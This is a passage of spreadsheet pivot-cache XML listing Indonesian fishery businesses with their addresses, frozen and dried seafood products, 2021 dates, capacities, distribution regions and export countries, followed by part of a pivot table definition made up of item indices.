    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kabupaten Bogor, Kabupaten Sukabumi, Kabupaten Bekasi, Kota Bogor, Kota Sukabumi, Kota Bekasi, Kota Depok, Kabupaten Tangerang, Kota Tangerang, Kota Tangerang Selatan"/>
    <s v="Chile, China, Japan, Korea, Democratic People's Republic of, Oman, Peru, Taiwan, Province of China, Viet Nam"/>
  </r>
  <r>
    <n v="26273"/>
    <x v="1251"/>
    <s v="PT. BINTANG SAMUDERA AGRO TANI MAKMUR"/>
    <s v="Kawasan PPS Nizam Zachman Blok K 7D (Room 2), Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Cephalopoda Beku (Cumi-cumi)"/>
    <d v="2021-06-22T00:00:00"/>
    <n v="50000"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kabupaten Bogor, Kabupaten Sukabumi, Kabupaten Bekasi, Kota Bogor, Kota Sukabumi, Kota Bekasi, Kota Depok, Kabupaten Tangerang, Kota Tangerang, Kota Tangerang Selatan"/>
    <s v="Chile, China, Japan, Korea, Democratic People's Republic of, Oman, Peru, Taiwan, Province of China, Viet Nam"/>
  </r>
  <r>
    <n v="26274"/>
    <x v="1251"/>
    <s v="PT. BINTANG SAMUDERA AGRO TANI MAKMUR"/>
    <s v="Kawasan PPS Nizam Zachman Blok K 7D (Room 2), Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Daging Tuna Beku"/>
    <d v="2021-06-22T00:00:00"/>
    <n v="50000"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kabupaten Bogor, Kabupaten Sukabumi, Kabupaten Bekasi, Kota Bogor, Kota Sukabumi, Kota Bekasi, Kota Depok, Kabupaten Tangerang, Kota Tangerang, Kota Tangerang Selatan"/>
    <m/>
  </r>
  <r>
    <n v="26275"/>
    <x v="1252"/>
    <s v="PT. BINTANG TIRTA SEMESTA"/>
    <s v="Kawasan PPS Nizam Zachman Blok K 7D (Room 3), Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Ikan Demersal Beku (Gulama, Lencam, Kerapu, Layur, Halibut, Kakatua, Kakap)"/>
    <d v="2021-06-22T00:00:00"/>
    <n v="150000"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kabupaten Bogor, Kabupaten Sukabumi, Kabupaten Bekasi, Kota Bogor, Kota Sukabumi, Kota Bekasi, Kota Depok, Kabupaten Tangerang, Kota Tangerang, Kota Tangerang Selatan"/>
    <m/>
  </r>
  <r>
    <n v="26276"/>
    <x v="1252"/>
    <s v="PT. BINTANG TIRTA SEMESTA"/>
    <s v="Kawasan PPS Nizam Zachman Blok K 7D (Room 3), Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Cephalopoda Beku (Cumi-cumi)"/>
    <d v="2021-06-22T00:00:00"/>
    <n v="50000"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kabupaten Bogor, Kabupaten Sukabumi, Kabupaten Bekasi, Kota Bogor, Kota Sukabumi, Kota Bekasi, Kota Depok, Kabupaten Tangerang, Kota Tangerang, Kota Tangerang Selatan"/>
    <s v="Japan, Korea, Democratic People's Republic of"/>
  </r>
  <r>
    <n v="26277"/>
    <x v="1252"/>
    <s v="PT. BINTANG TIRTA SEMESTA"/>
    <s v="Kawasan PPS Nizam Zachman Blok K 7D (Room 3), Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Daging Tuna Beku"/>
    <d v="2021-06-22T00:00:00"/>
    <n v="50000"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kabupaten Bogor, Kabupaten Sukabumi, Kabupaten Bekasi, Kota Bogor, Kota Sukabumi, Kota Bekasi, Kota Depok, Kabupaten Tangerang, Kota Tangerang, Kota Tangerang Selatan"/>
    <m/>
  </r>
  <r>
    <n v="26283"/>
    <x v="1259"/>
    <s v="PT. AGRO MINA SEMESTA"/>
    <s v="Kawasan Pelabuhan Perikanan Samudera Nizam Zachman, Jl. Muara Baru Ujung Blok K 7D (Room 1), Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Ikan Demersal Beku (Gulama, Lencam, Kerapu, Layur, Halibut, Beloso, Kakatua, Kakap)"/>
    <d v="2021-06-22T00:00:00"/>
    <n v="30000"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kabupaten Bekasi, Kabupaten Tangerang"/>
    <s v="Australia, Chile, Philippines"/>
  </r>
  <r>
    <n v="26284"/>
    <x v="1259"/>
    <s v="PT. AGRO MINA SEMESTA"/>
    <s v="Kawasan Pelabuhan Perikanan Samudera Nizam Zachman, Jl. Muara Baru Ujung Blok K 7D (Room 1), Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Cephalopoda Beku (Cumi-cumi)"/>
    <d v="2021-06-22T00:00:00"/>
    <n v="30000"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kota Bekasi, Kota Tangerang"/>
    <m/>
  </r>
  <r>
    <n v="26285"/>
    <x v="1259"/>
    <s v="PT. AGRO MINA SEMESTA"/>
    <s v="Kawasan Pelabuhan Perikanan Samudera Nizam Zachman, Jl. Muara Baru Ujung Blok K 7D (Room 1), Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Ikan Pelagis Beku (Makerel, Tongkol, Escolar, Kembung, Cakalang, Tenggiri, Salem)"/>
    <d v="2021-06-22T00:00:00"/>
    <n v="30000"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kabupaten Bogor, Kota Bekasi, Kota Depok, Kota Tangerang"/>
    <s v="Chile, China, Japan, Korea, Democratic People's Republic of, Viet Nam"/>
  </r>
  <r>
    <n v="26286"/>
    <x v="1260"/>
    <s v="PT. ELITISM INTERNASIONAL PAPUA"/>
    <s v="Jl. Utarum Kaki Air Kecil, Kel. Krooy, Kec. Kaimana, Kabupaten Kaimana&lt;br&gt;Papua Barat"/>
    <n v="33"/>
    <s v="Ikan Demersal Beku (Barramundi, Kerapu, Kakap)"/>
    <d v="2021-06-21T00:00:00"/>
    <n v="100000"/>
    <s v="Kota Jakarta Utara, Kota Surabaya"/>
    <s v="China, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="26287"/>
    <x v="1260"/>
    <s v="PT. ELITISM INTERNASIONAL PAPUA"/>
    <s v="Jl. Utarum Kaki Air Kecil, Kel. Krooy, Kec. Kaimana, Kabupaten Kaimana&lt;br&gt;Papua Barat"/>
    <n v="33"/>
    <s v="Ikan Pelagis Beku (Kembung, Layang, Cakalang, Tenggiri)"/>
    <d v="2021-06-22T00:00:00"/>
    <n v="100000"/>
    <s v="Kota Jakarta Utara, Kota Surabaya"/>
    <s v="China, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="26288"/>
    <x v="1260"/>
    <s v="PT. ELITISM INTERNASIONAL PAPUA"/>
    <s v="Jl. Utarum Kaki Air Kecil, Kel. Krooy, Kec. Kaimana, Kabupaten Kaimana&lt;br&gt;Papua Barat"/>
    <n v="33"/>
    <s v="Udang Beku"/>
    <d v="2021-06-21T00:00:00"/>
    <n v="100000"/>
    <s v="Kota Jakarta Utara, Kota Surabaya"/>
    <s v="China, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="26289"/>
    <x v="1260"/>
    <s v="PT. ELITISM INTERNASIONAL PAPUA"/>
    <s v="Jl. Utarum Kaki Air Kecil, Kel. Krooy, Kec. Kaimana, Kabupaten Kaimana&lt;br&gt;Papua Barat"/>
    <n v="33"/>
    <s v="Fillet Ikan Beku"/>
    <d v="2021-06-21T00:00:00"/>
    <n v="100000"/>
    <s v="Kota Jakarta Utara, Kota Surabaya"/>
    <s v="China, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="26294"/>
    <x v="42"/>
    <s v="PT. SANJAYA INTERNASIONAL FISHERY"/>
    <s v="Kawasan Pelabuhan Perikanan Muara Angke, Jl. Pendaratan Ikan No. 3 Muara Angke, Kel. Pluit, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Salmon Beku, Trout Beku"/>
    <d v="2021-06-22T00:00:00"/>
    <n v="100000"/>
    <s v="Kota Jakarta Selatan"/>
    <m/>
  </r>
  <r>
    <n v="26295"/>
    <x v="42"/>
    <s v="PT. SANJAYA INTERNASIONAL FISHERY"/>
    <s v="Kawasan Pelabuhan Perikanan Muara Angke, Jl. Pendaratan Ikan No. 3 Muara Angke, Kel. Pluit, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Salmon Segar, Trout Segar"/>
    <d v="2021-06-22T00:00:00"/>
    <n v="100000"/>
    <s v="Kota Jakarta Selatan"/>
    <m/>
  </r>
  <r>
    <n v="26296"/>
    <x v="1257"/>
    <s v="PT. NAGA LAUT BERSINAR"/>
    <s v="Unit Pengepakan Ikan No.15A-16, Kel. Pluit, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Ikan Demersal Beku (Barramundi, Kakap, Kaci-kaci, Beloso, Kurisi, Ayam-ayam, Bawal, Swanggi, Lencam, Sebelah, Manyung, Biji Nangka, Kerapu, Layur)"/>
    <d v="2021-07-01T00:00:00"/>
    <n v="1000000"/>
    <m/>
    <s v="China, Hong Kong, Japan, Korea, Democratic People's Republic of, Malaysia, Singapore, Taiwan, Province of China, Viet Nam"/>
  </r>
  <r>
    <n v="26304"/>
    <x v="1261"/>
    <s v="UNI JN"/>
    <s v="Jl. Sungai Hitam RT 12 No.23, Kel. Pasar Pedati, Kec. Pondok Kelapa, Kabupaten Bengkulu Tengah&lt;br&gt;Bengkulu"/>
    <n v="8"/>
    <s v="Teri Crispy"/>
    <d v="2021-06-24T00:00:00"/>
    <n v="2400"/>
    <s v="Kota Bengkulu"/>
    <m/>
  </r>
  <r>
    <n v="26305"/>
    <x v="1261"/>
    <s v="UNI JN"/>
    <s v="Jl. Sungai Hitam RT 12 No.23, Kel. Pasar Pedati, Kec. Pondok Kelapa, Kabupaten Bengkulu Tengah&lt;br&gt;Bengkulu"/>
    <n v="8"/>
    <s v="Basreng Ikan"/>
    <d v="2021-06-24T00:00:00"/>
    <n v="1800"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="26329"/>
    <x v="1262"/>
    <s v="PENGGILINGAN BAKSO RIKA 87"/>
    <s v="Jl. Pariwisata Pasar Bengkulu RT 08, Kel. Pasar Bengkulu, Kec. Sungai Serut, Kota Bengkulu&lt;br&gt;Bengkulu"/>
    <n v="8"/>
    <s v="Surimi Beku"/>
    <d v="2021-06-24T00:00:00"/>
    <n v="1000"/>
    <s v="Kota Bengkulu"/>
    <m/>
  </r>
  <r>
    <n v="26330"/>
    <x v="1262"/>
    <s v="PENGGILINGAN BAKSO RIKA 87"/>
    <s v="Jl. Pariwisata Pasar Bengkulu RT 08, Kel. Pasar Bengkulu, Kec. Sungai Serut, Kota Bengkulu&lt;br&gt;Bengkulu"/>
    <n v="8"/>
    <s v="Pempek Ikan"/>
    <d v="2021-06-24T00:00:00"/>
    <n v="500"/>
    <s v="Kota Bengkulu"/>
    <m/>
  </r>
  <r>
    <n v="26331"/>
    <x v="1262"/>
    <s v="PENGGILINGAN BAKSO RIKA 87"/>
    <s v="Jl. Pariwisata Pasar Bengkulu RT 08, Kel. Pasar Bengkulu, Kec. Sungai Serut, Kota Bengkulu&lt;br&gt;Bengkulu"/>
    <n v="8"/>
    <s v="Tekwan Ikan"/>
    <d v="2021-06-24T00:00:00"/>
    <n v="500"/>
    <s v="Kota Bengkulu"/>
    <m/>
  </r>
  <r>
    <n v="26332"/>
    <x v="1263"/>
    <s v="KOPERASI USAHA MUDA MANDIRI KEPAHIANG"/>
    <s v="Jl. Raya Bengko, Kel. Sukamerindu, Kec. Kepahiang, Kabupaten Kepahiang&lt;br&gt;Bengkulu"/>
    <n v="8"/>
    <s v="Ikan Pelagis Beku (Tongkol, Sarden, Tenggiri)"/>
    <d v="2021-07-02T00:00:00"/>
    <n v="1000"/>
    <s v="Kabupaten Kepahiang"/>
    <m/>
  </r>
  <r>
    <n v="26333"/>
    <x v="1263"/>
    <s v="KOPERASI USAHA MUDA MANDIRI KEPAHIANG"/>
    <s v="Jl. Raya Bengko, Kel. Sukamerindu, Kec. Kepahiang, Kabupaten Kepahiang&lt;br&gt;Bengkulu"/>
    <n v="8"/>
    <s v="Ikan Pelagis Segar (Tongkol, Sarden, Tenggiri)"/>
    <d v="2021-07-02T00:00:00"/>
    <n v="1500"/>
    <s v="Kabupaten Kepahiang"/>
    <m/>
  </r>
  <r>
    <n v="26334"/>
    <x v="1263"/>
    <s v="KOPERASI USAHA MUDA MANDIRI KEPAHIANG"/>
    <s v="Jl. Raya Bengko, Kel. Sukamerindu, Kec. Kepahiang, Kabupaten Kepahiang&lt;br&gt;Bengkulu"/>
    <n v="8"/>
    <s v="Surimi Beku"/>
    <d v="2021-07-02T00:00:00"/>
    <n v="500"/>
    <s v="Kabupaten Kepahiang"/>
    <m/>
  </r>
  <r>
    <n v="26368"/>
    <x v="1264"/>
    <s v="UD. SUMBER REZEKI"/>
    <s v="Kompleks PPP Goto, Kel. Goto, Kec. Tidore, Kota Tidore Kepulauan&lt;br&gt;Maluku Utara"/>
    <n v="32"/>
    <s v="Ikan Pelagis Beku (Baby Tuna, Tongkol, Layang, Cakalang, Tenggiri)"/>
    <d v="2021-06-25T00:00:00"/>
    <n v="300000"/>
    <s v="Kota Jakarta Pusat, Kota Surabaya, Kota Bitung, Kota Ternate"/>
    <s v="China, Korea, Democratic People's Republic of, Singapore"/>
  </r>
  <r>
    <n v="26370"/>
    <x v="1182"/>
    <s v="PT. SUMBER REJEKI BERKAH LAUTAN INDONESIA"/>
    <s v="Jl. Magepanda KM 10 RT 012 RW 004, Kel. Hewuli, Kec. Alok Barat, Kabupaten Sikka&lt;br&gt;Nusa Tenggara Timur"/>
    <n v="19"/>
    <s v="Ikan Demersal Beku (Mata Besar, Lencam, Sebelah, Manyung, Kerapu, Layur, Beloso, Bawal, Kakap, Kurisi, Ekor Kuning)"/>
    <d v="2021-07-02T00:00:00"/>
    <n v="15000"/>
    <s v="Kabupaten Pasuruan, Kota Denpasar"/>
    <s v="Japan, Korea, Democratic People's Republic of, United States, Viet Nam"/>
  </r>
  <r>
    <n v="26374"/>
    <x v="1182"/>
    <s v="PT. SUMBER REJEKI BERKAH LAUTAN INDONESIA"/>
    <s v="Jl. Magepanda KM 10 RT 012 RW 004, Kel. Hewuli, Kec. Alok Barat, Kabupaten Sikka&lt;br&gt;Nusa Tenggara Timur"/>
    <n v="19"/>
    <s v="Cephalopoda Beku (Sotong, Gurita, Cumi-cumi)"/>
    <d v="2021-07-02T00:00:00"/>
    <n v="15000"/>
    <s v="Kabupaten Pasuruan, Kota Denpasar"/>
    <s v="Japan, Korea, Democratic People's Republic of, United States, Viet Nam"/>
  </r>
  <r>
    <n v="26385"/>
    <x v="407"/>
    <s v="CV. LAUTAN MAS"/>
    <s v="Jl. Pulau Nias Selatan No.1 KIM 3, Kel. Mabar, Kec. Medan Deli, Kota Medan&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Salmon Beku, Trout Beku"/>
    <d v="2021-06-23T00:00:00"/>
    <n v="20000"/>
    <s v="Kota Medan"/>
    <m/>
  </r>
  <r>
    <n v="26409"/>
    <x v="1265"/>
    <s v="CV. BERKAH LAUTAN ILAHI"/>
    <s v="Jl. Danau Towuti, Kel. Rufei, Kec. Sorong Barat, Kota Sorong&lt;br&gt;Papua Barat"/>
    <n v="33"/>
    <s v="Teripang Kering"/>
    <d v="2021-06-25T00:00:00"/>
    <n v="100000"/>
    <s v="Kota Medan, Kota Surabaya"/>
    <s v="China, Hong Kong"/>
  </r>
  <r>
    <n v="26432"/>
    <x v="1266"/>
    <s v="CV, EAST STAR TRADING"/>
    <s v="Jl, Pantai, Dusun Torohgusung, Kel, Santigi, Kec, Toli-Toli Utara, Kabupaten Toli-Toli&lt;br&gt;Sulawesi Tengah"/>
    <n v="28"/>
    <s v="Rumput Laut Kering"/>
    <d v="2021-07-02T00:00:00"/>
    <n v="80000"/>
    <s v="Kota Surabaya"/>
    <s v="United States"/>
  </r>
  <r>
    <n v="26447"/>
    <x v="1267"/>
    <s v="PT. ALAMSEGAR JAYA"/>
    <s v="Jl. Dermaga Baru No.9 Muara Angke, Kel. Pluit, Kec. Penjaringan , Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Ikan Pelagis Beku (Tongkol, Kembung, Layaran, Muroaji, Deho, Pedang, Lemuru, Lemadang, Marlin, Gindara, Salem, Cakalang, Tenggiri)"/>
    <d v="2021-07-02T00:00:00"/>
    <n v="63000"/>
    <s v="Kabupaten Bangka"/>
    <s v="China, Japan, Korea, Democratic People's Republic of, Malaysia, Singapore, Taiwan, Province of China, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="26448"/>
    <x v="1267"/>
    <s v="PT. ALAMSEGAR JAYA"/>
    <s v="Jl. Dermaga Baru No.9 Muara Angke, Kel. Pluit, Kec. Penjaringan , Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Cephalopoda Beku (Sotong, Gurita, Cumi-cumi)"/>
    <d v="2021-07-02T00:00:00"/>
    <n v="78000"/>
    <m/>
    <s v="China, Japan, Korea, Democratic People's Republic of, Malaysia, Singapore, Taiwan, Province of China, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="26449"/>
    <x v="1267"/>
    <s v="PT. ALAMSEGAR JAYA"/>
    <s v="Jl. Dermaga Baru No.9 Muara Angke, Kel. Pluit, Kec. Penjaringan , Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Ikan Demersal Beku (Bawal, Baronang, Remang, Lencam, Manyung, Kerapu, Layur, Halibut, Sukang, Kakap, Ekor Kuning)"/>
    <d v="2021-07-02T00:00:00"/>
    <n v="48000"/>
    <s v="Kabupaten Bangka"/>
    <s v="China, Japan, Korea, Democratic People's Republic of, Malaysia, Singapore, Taiwan, Province of China, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="26491"/>
    <x v="989"/>
    <s v="PT. GERBANG BAHARI SEJAHTERA"/>
    <s v="Jl. Dermaga Pelabuhan Perikanan Muara Angke No.01, Kel. Pluit, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Daging Tuna Beku"/>
    <d v="2021-07-01T00:00:00"/>
    <n v="300000"/>
    <s v="Kota Jakarta Utara, Kabupaten Indramayu, Kabupaten Karawang"/>
    <m/>
  </r>
  <r>
    <n v="26497"/>
    <x v="1268"/>
    <s v="UD. CAHAYA MARINA FISHERY"/>
    <s v="Jl. Puri Komplek PPI Klademak II Pantai, Kel. Klaligi, Kec. Sorong Manoi, Kota Sorong&lt;br&gt;Papua Barat"/>
    <n v="33"/>
    <s v="Cephalopoda Beku (Sotong, Gurita, Cumi-cumi)"/>
    <d v="2021-07-05T00:00:00"/>
    <n v="75000"/>
    <s v="Kota Jakarta Utara, Kota Surabaya"/>
    <m/>
  </r>
  <r>
    <n v="26498"/>
    <x v="1268"/>
    <s v="UD. CAHAYA MARINA FISHERY"/>
    <s v="Jl. Puri Komplek PPI Klademak II Pantai, Kel. Klaligi, Kec. Sorong Manoi, Kota Sorong&lt;br&gt;Papua Barat"/>
    <n v="33"/>
    <s v="Ikan Demersal Beku (Kakap Putih, Kerapu Bintik, Kerapu, Kakatua, Kakap Merah, Kakap)"/>
    <d v="2021-07-05T00:00:00"/>
    <n v="100000"/>
    <s v="Kota Jakarta Utara, Kota Bekasi, Kota Surabaya"/>
    <m/>
  </r>
  <r>
    <n v="26499"/>
    <x v="1268"/>
    <s v="UD. CAHAYA MARINA FISHERY"/>
    <s v="Jl. Puri Komplek PPI Klademak II Pantai, Kel. Klaligi, Kec. Sorong Manoi, Kota Sorong&lt;br&gt;Papua Barat"/>
    <n v="33"/>
    <s v="Ikan Pelagis Beku (Tongkol, Layur, Kembung, Layang, Tenggiri, Tuna Cakalang)"/>
    <d v="2021-07-05T00:00:00"/>
    <n v="100000"/>
    <s v="Kota Jakarta Utara, Kota Surabaya"/>
    <m/>
  </r>
  <r>
    <n v="26500"/>
    <x v="1268"/>
    <s v="UD. CAHAYA MARINA FISHERY"/>
    <s v="Jl. Puri Komplek PPI Klademak II Pantai, Kel. Klaligi, Kec. Sorong Manoi, Kota Sorong&lt;br&gt;Papua Barat"/>
    <n v="33"/>
    <s v="Tuna Beku"/>
    <d v="2021-07-05T00:00:00"/>
    <n v="80000"/>
    <s v="Kota Jakarta Utara, Kota Surabaya"/>
    <m/>
  </r>
  <r>
    <n v="26501"/>
    <x v="1268"/>
    <s v="UD. CAHAYA MARINA FISHERY"/>
    <s v="Jl. Puri Komplek PPI Klademak II Pantai, Kel. Klaligi, Kec. Sorong Manoi, Kota Sorong&lt;br&gt;Papua Barat"/>
    <n v="33"/>
    <s v="Tuna Loin Beku"/>
    <d v="2021-07-05T00:00:00"/>
    <n v="100000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="26519"/>
    <x v="1269"/>
    <s v="UD. JANGKAR EMAS"/>
    <s v="Jl. Puri Kompleks PPI Klademak II Pantai, Kel. Klaligi, Kec. Sorong Manoi, Kota Sorong&lt;br&gt;Papua Barat"/>
    <n v="33"/>
    <s v="Tuna Loin Beku"/>
    <d v="2021-07-02T00:00:00"/>
    <n v="100000"/>
    <s v="Kota Jakarta Utara, Kota Surabaya, Kota Bitung, Kota Makassar"/>
    <m/>
  </r>
  <r>
    <n v="26520"/>
    <x v="1269"/>
    <s v="UD. JANGKAR EMAS"/>
    <s v="Jl. Puri Kompleks PPI Klademak II Pantai, Kel. Klaligi, Kec. Sorong Manoi, Kota Sorong&lt;br&gt;Papua Barat"/>
    <n v="33"/>
    <s v="Tuna Beku"/>
    <d v="2021-07-02T00:00:00"/>
    <n v="100000"/>
    <s v="Kota Jakarta Utara, Kota Surabaya, Kota Bitung, Kota Makassa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E079AD-1234-A44F-9A76-15AA0DB13732}" name="PivotTable3" cacheId="2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3:B1273" firstHeaderRow="1" firstDataRow="1" firstDataCol="1"/>
  <pivotFields count="10">
    <pivotField compact="0" outline="0" showAll="0" defaultSubtotal="0"/>
    <pivotField axis="axisRow" compact="0" outline="0" showAll="0" defaultSubtotal="0">
      <items count="1270">
        <item x="860"/>
        <item x="1050"/>
        <item x="472"/>
        <item x="666"/>
        <item x="507"/>
        <item x="811"/>
        <item x="418"/>
        <item x="850"/>
        <item x="55"/>
        <item x="500"/>
        <item x="664"/>
        <item x="814"/>
        <item x="911"/>
        <item x="867"/>
        <item x="7"/>
        <item x="741"/>
        <item x="57"/>
        <item x="866"/>
        <item x="910"/>
        <item x="878"/>
        <item x="756"/>
        <item x="431"/>
        <item x="37"/>
        <item x="1018"/>
        <item x="234"/>
        <item x="1030"/>
        <item x="1029"/>
        <item x="1043"/>
        <item x="1085"/>
        <item x="1042"/>
        <item x="1077"/>
        <item x="512"/>
        <item x="1019"/>
        <item x="954"/>
        <item x="518"/>
        <item x="493"/>
        <item x="761"/>
        <item x="118"/>
        <item x="513"/>
        <item x="42"/>
        <item x="508"/>
        <item x="1152"/>
        <item x="1114"/>
        <item x="352"/>
        <item x="217"/>
        <item x="600"/>
        <item x="273"/>
        <item x="93"/>
        <item x="31"/>
        <item x="842"/>
        <item x="424"/>
        <item x="1136"/>
        <item x="13"/>
        <item x="328"/>
        <item x="332"/>
        <item x="354"/>
        <item x="124"/>
        <item x="151"/>
        <item x="295"/>
        <item x="360"/>
        <item x="87"/>
        <item x="50"/>
        <item x="656"/>
        <item x="36"/>
        <item x="2"/>
        <item x="596"/>
        <item x="306"/>
        <item x="479"/>
        <item x="494"/>
        <item x="257"/>
        <item x="925"/>
        <item x="304"/>
        <item x="474"/>
        <item x="780"/>
        <item x="617"/>
        <item x="79"/>
        <item x="857"/>
        <item x="134"/>
        <item x="381"/>
        <item x="652"/>
        <item x="542"/>
        <item x="1190"/>
        <item x="566"/>
        <item x="432"/>
        <item x="408"/>
        <item x="410"/>
        <item x="219"/>
        <item x="436"/>
        <item x="670"/>
        <item x="191"/>
        <item x="190"/>
        <item x="738"/>
        <item x="1179"/>
        <item x="516"/>
        <item x="433"/>
        <item x="380"/>
        <item x="147"/>
        <item x="805"/>
        <item x="565"/>
        <item x="368"/>
        <item x="232"/>
        <item x="487"/>
        <item x="315"/>
        <item x="446"/>
        <item x="921"/>
        <item x="673"/>
        <item x="139"/>
        <item x="135"/>
        <item x="435"/>
        <item x="115"/>
        <item x="223"/>
        <item x="314"/>
        <item x="550"/>
        <item x="634"/>
        <item x="220"/>
        <item x="247"/>
        <item x="138"/>
        <item x="26"/>
        <item x="283"/>
        <item x="874"/>
        <item x="291"/>
        <item x="757"/>
        <item x="240"/>
        <item x="387"/>
        <item x="34"/>
        <item x="384"/>
        <item x="960"/>
        <item x="742"/>
        <item x="248"/>
        <item x="78"/>
        <item x="897"/>
        <item x="44"/>
        <item x="395"/>
        <item x="515"/>
        <item x="820"/>
        <item x="414"/>
        <item x="11"/>
        <item x="564"/>
        <item x="374"/>
        <item x="776"/>
        <item x="245"/>
        <item x="959"/>
        <item x="201"/>
        <item x="359"/>
        <item x="281"/>
        <item x="362"/>
        <item x="635"/>
        <item x="158"/>
        <item x="975"/>
        <item x="781"/>
        <item x="262"/>
        <item x="704"/>
        <item x="280"/>
        <item x="979"/>
        <item x="10"/>
        <item x="638"/>
        <item x="402"/>
        <item x="694"/>
        <item x="209"/>
        <item x="120"/>
        <item x="67"/>
        <item x="1236"/>
        <item x="159"/>
        <item x="441"/>
        <item x="918"/>
        <item x="179"/>
        <item x="591"/>
        <item x="47"/>
        <item x="483"/>
        <item x="463"/>
        <item x="404"/>
        <item x="1131"/>
        <item x="104"/>
        <item x="207"/>
        <item x="902"/>
        <item x="398"/>
        <item x="986"/>
        <item x="150"/>
        <item x="551"/>
        <item x="895"/>
        <item x="764"/>
        <item x="644"/>
        <item x="454"/>
        <item x="434"/>
        <item x="469"/>
        <item x="593"/>
        <item x="553"/>
        <item x="1084"/>
        <item x="570"/>
        <item x="425"/>
        <item x="316"/>
        <item x="556"/>
        <item x="583"/>
        <item x="401"/>
        <item x="225"/>
        <item x="292"/>
        <item x="156"/>
        <item x="73"/>
        <item x="369"/>
        <item x="984"/>
        <item x="53"/>
        <item x="824"/>
        <item x="746"/>
        <item x="356"/>
        <item x="259"/>
        <item x="535"/>
        <item x="161"/>
        <item x="76"/>
        <item x="90"/>
        <item x="127"/>
        <item x="559"/>
        <item x="258"/>
        <item x="373"/>
        <item x="364"/>
        <item x="88"/>
        <item x="739"/>
        <item x="1066"/>
        <item x="140"/>
        <item x="132"/>
        <item x="51"/>
        <item x="162"/>
        <item x="450"/>
        <item x="732"/>
        <item x="171"/>
        <item x="301"/>
        <item x="755"/>
        <item x="705"/>
        <item x="153"/>
        <item x="212"/>
        <item x="590"/>
        <item x="54"/>
        <item x="358"/>
        <item x="251"/>
        <item x="819"/>
        <item x="562"/>
        <item x="28"/>
        <item x="379"/>
        <item x="98"/>
        <item x="211"/>
        <item x="75"/>
        <item x="226"/>
        <item x="297"/>
        <item x="787"/>
        <item x="567"/>
        <item x="426"/>
        <item x="643"/>
        <item x="208"/>
        <item x="546"/>
        <item x="399"/>
        <item x="1230"/>
        <item x="21"/>
        <item x="575"/>
        <item x="165"/>
        <item x="532"/>
        <item x="440"/>
        <item x="236"/>
        <item x="884"/>
        <item x="122"/>
        <item x="620"/>
        <item x="754"/>
        <item x="260"/>
        <item x="77"/>
        <item x="701"/>
        <item x="170"/>
        <item x="357"/>
        <item x="313"/>
        <item x="206"/>
        <item x="712"/>
        <item x="193"/>
        <item x="1"/>
        <item x="94"/>
        <item x="256"/>
        <item x="137"/>
        <item x="640"/>
        <item x="216"/>
        <item x="531"/>
        <item x="293"/>
        <item x="269"/>
        <item x="1167"/>
        <item x="765"/>
        <item x="677"/>
        <item x="175"/>
        <item x="91"/>
        <item x="254"/>
        <item x="214"/>
        <item x="279"/>
        <item x="537"/>
        <item x="178"/>
        <item x="533"/>
        <item x="174"/>
        <item x="861"/>
        <item x="123"/>
        <item x="386"/>
        <item x="84"/>
        <item x="523"/>
        <item x="52"/>
        <item x="19"/>
        <item x="173"/>
        <item x="128"/>
        <item x="105"/>
